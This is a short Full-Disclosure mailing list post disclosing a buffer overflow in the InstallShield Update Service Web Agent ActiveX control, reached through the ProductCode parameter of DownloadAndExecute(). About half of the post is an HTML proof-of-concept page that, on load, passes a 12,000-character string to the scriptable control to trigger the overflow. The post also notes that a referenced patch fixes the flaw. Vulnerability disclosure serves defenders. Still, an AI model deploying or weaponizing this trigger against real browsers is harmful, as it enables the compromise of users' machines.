The InstallShield Update Service Web Agent version 5.1.100.47363 suffers from an
exploitable buffer overflow in the ProductCode parameter of the
DownloadAndExecute()
function. This object is marked safe for scripting. Note that this issue
appears to different
from http://www.securityfocus.com/bid/26280(the iDefense advisory seems to be
talking about insecure methods), however, the patch referenced in that
issue fixes this issue as well since the update renders this object unsafe for
scripting.
PoC as follows:
-----------------------
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = 'A';
while (s.length <= 12000) s = s + 'A';
obj.Initialize("", "", "", "");
obj.DownloadAndExecute("", s, 0, "", "");
}
</script>
</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:E9880553-B8A7-4960-A668-95C68BED571E"
/>
</object>
</body>
</html>
-----------------------
Elazar
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
